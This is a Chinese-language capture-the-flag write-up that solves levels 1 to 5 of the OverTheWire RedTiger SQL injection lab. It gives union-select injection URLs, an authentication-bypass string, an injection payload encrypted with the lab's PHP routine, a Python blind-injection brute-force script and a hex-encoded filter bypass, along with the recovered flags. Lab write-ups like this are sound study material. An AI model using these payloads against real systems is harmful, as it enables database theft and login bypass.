第一关
首先点进Category 1
网址后面跟了?cat=1,很明显是一个sql注入
看了下还给了表名。。Tablename: level1_users
构造了下
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
得到密码thatwaseasy
flag是27cbddc803ecde822d87a7e8639f9315
第二关
看见有登录框,应该也是sql注入
用万能用户密码’or ”=’试了下,成功注入
flag是1222e2d4ad5da677efb188550528bfaa
第三关
看到提示Get an error。。。弄了半天弄不出error,看了下别人的wp,改成?usr[1]=1得到error信息,
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25
然后看了下urlcrypt.inc,有下面的代码,看来cow和admin后面的一大串都是加密过的,既然给了加密和解密的函数,直接写sql注入然后加密再传过去就可以了,话说它的加密方式还更新过。。这个如果要用的话要在linux下面加密,在windows下可能会乱码
<?php
// warning! ugly code ahead :)
function encrypt($str)
{
$cryptedstr = "";
srand(3284724);
for ($i =0; $i < strlen($str); $i++)
{
$temp = ord(substr($str,$i,1)) ^ rand(0, 255);
while(strlen($temp)<3)
{
$temp = "0".$temp;
}
$cryptedstr .= $temp. "";
}
return base64_encode($cryptedstr);
}
function decrypt ($str)
{
srand(3284724);
if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
{
$str = base64_decode($str);
if ($str != "" && $str != null && $str != false)
{
$decStr = "";
for ($i=0; $i < strlen($str); $i+=3)
{
$array[$i/3] = substr($str,$i,3);
}
foreach($array as $s)
{
$a = $s ^ rand(0, 255);
$decStr .= chr($a);
}
return $decStr;
}
return false;
}
return false;
}
?>
构造的明文为’ union select 1,password,2,3,4,5,6 from level3_users where username=’Admin
加密后得到
https://redtiger.labs.overthewire.org/level3.php?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw
拿到flag:a707b245a60d570d25a0449c2a516eca
第四关
点了下click me,发现多了?id=1 很明显是可以注入,看了下主页的标题是盲注。。
先猜keyword有多长
http://redtiger.labs.overthewire.org/level4.php?id=1%20and%200%3C(select%20count(*)%20from%20level4_secret%20where%20length(keyword)=21)
发现长度为21,那写个python脚本来爆破一下
from urllib.request import *
import string
from re import *
char=string.printable
url="http://redtiger.labs.overthewire.org/level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,{0},1)='{1}')"
login ={'Cookie':'level4login=there_is_no_bug'}
answer=""
for q in range(1,22):
for i in char:
test=(url .format(q,i))
request=Request(test,None,headers=login)
a=urlopen(request)
s=a.read().decode()
if(findall("Query returned 1 rows.",s)):
print("{0} ".format(q)+i)
answer+=i
break
print(answer)
得到keyword为 killstickswithbr1cks!
flag: e8bcb79c389f5e295bac81fda9fd7cfa
第五关
看到描述watch the login errors
然后输admin进去试下,然后输入框消失了,看来是过滤了admin
然后发现它也无视大小写,那直接用十六进制来绕过吧
根据提示密码要md5加密
构造出
’ union select 0x61646d696e as username, md5(123) as password #
flag为ca5c3c4f0bc85af1392aef35fc1d09b3
未完待续